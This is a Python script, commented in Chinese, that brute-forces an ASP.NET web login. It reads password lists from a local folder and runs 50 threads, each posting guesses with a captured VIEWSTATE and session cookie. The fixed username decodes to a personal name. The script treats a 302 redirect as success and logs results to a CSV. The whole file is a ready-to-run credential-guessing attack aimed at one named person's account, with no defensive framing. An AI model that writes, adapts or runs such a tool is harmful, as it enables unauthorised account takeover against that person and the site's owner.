#coding=utf-8
import queue
import threading
import csv
import time
import os
import re
import requests
PASSWORDDIR =os.getcwd()+"\\PasswordDir"
mPasswordQueue = queue.Queue() # 存放密码的队列
class MyThread(threading.Thread):
def __init__(self, func):
threading.Thread.__init__(self)
self.func = func
def run(self):
self.func()
def do_work():
while True:#不要使用 while not out_queue.empty():
password=mPasswordQueue.get()
#TODO
result=web_login(password,"用户密码不正确")
mPasswordQueue.task_done() # 传入一个相当于完成一个任务
if result[0]==1 and result[1]==302:
str_print=("[+]Success:{} {} {} {}".format(result[1], result[2], result[3], result[4]))
print(str_print)
break
else:
if result[0]==-1:
mPasswordQueue.put(password)
str_print =("[-]Fail:{} {} {} {}".format(result[1], result[2], result[3], result[4]))
print(str_print)
with open("suceess.csv", "a+", encoding="utf-8",newline='') as f:
writer = csv.writer(f)
writer.writerow([result[1], result[2], result[3], result[4]])
f.close()
def web_login(password,error_password_tips):
url="http://xxxxxxxxxxxx/Login.aspx"
header = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Cache-Control': 'max-age=0',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36',
'Connection': 'keep-alive',
'Referer': 'http://xxxxxxxxxxxxxx/Login.aspx'
}
data="__VIEWSTATE=%2FwEPDwUJNTk5MzkwMTEwD2QWAgIDD2QWAgIGDxAPFgIeB1Zpc2libGVoZGQWAGRkottryBsY1ggu8eeZoJVLs%2FX%2BTBMvQBPzZrNJw6vIEds%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEdAA38pfJWQZqdusZJ0w1r9wEvVK7BrRAtEiqu9nGFEI%2BjB8iHRs8wx0ZsHaVLh4w40eCinihG6d%2FXh3PZm3b5AoMQBz3vgTciq0jjAXrLjCmyWnluaRD6Qd9Og6KeRtbR3Zc1jHnGwsE7K7Ab7Z7ddgMk8XOsz4DupmbdavTQo9Jm9l5DwoD%2BEdmVHWaIrMKl88dBhIQaJG%2BXFYIydigrIZE6pDKHtBNrVQzdCffUUPNz1TkxRDv1DQzRHLO0lOn8x8g1oFPknU2UGjPEOPtnAuV9Oeawen6U0cTWUMuhcyHHRYjLViutcqN30MzShSAVYSw%3D&txtUsername=&txtUserpassword=&txtBigusername=%E6%9D%A8%E5%A9%B7&txtBigpassword={%password%}&btnBiglogin=%E7%99%BB%E5%BD%95&hiddenloginimg=&hiddenmacaddr=&hdhasReturnUrl=&hdDigestID=&hdsnid=&hddogmessage=PFLZFJVA2BP30%2B69F7%2F8"
fix_data = data.replace("{%password%}", password)
cookie_list=[{"ASP.NET_SessionId":"335gq1s5j13b4sugk10vryol"}]
status_code=-1
content_length=0
response=""
try:
req = requests.post(url, headers=header, data=fix_data, cookies=cookie_list[0])
response = req.text
#print(response)
status_code= req.status_code
content_length=req.headers['content-length']
except Exception as e:
print(str(e))
return [-1, status_code, content_length, password,"Network connect exception"]
if re.search(error_password_tips, response) is not None:
return [0,status_code,content_length,password, "Password is incorrect"]
return [1,status_code,content_length,password,"???"]
def openFile(passwordFile):
datas=[]
f = open(passwordFile, "rb") # 二进制格式读文件
while True:
line = f.readline()
if not line:
break
else:
try:
datas.append(line.decode('utf8'))
except:
datas.append(str(line))
return datas
start = time.time()
def main():
# 都存放到mPasswordQueue队列中
for file in os.listdir(PASSWORDDIR):
filePath = os.path.join(PASSWORDDIR,file)
print("[SCAN]{}".format(filePath))
datas =openFile(filePath)
for data in datas:
mPasswordQueue.put(data.strip("\n"))
for i in range(50):
t = MyThread(do_work) # 线程任务就是将网址的源代码存放到out_queue队列中
t.setDaemon(True) # 设置为守护线程
t.start()
print ("mPasswordQueue: %d" % mPasswordQueue.qsize())
mPasswordQueue.join() # 线程依次执行,主线程最后执行
main()
print ("Total time :%s" % (time.time() - start))
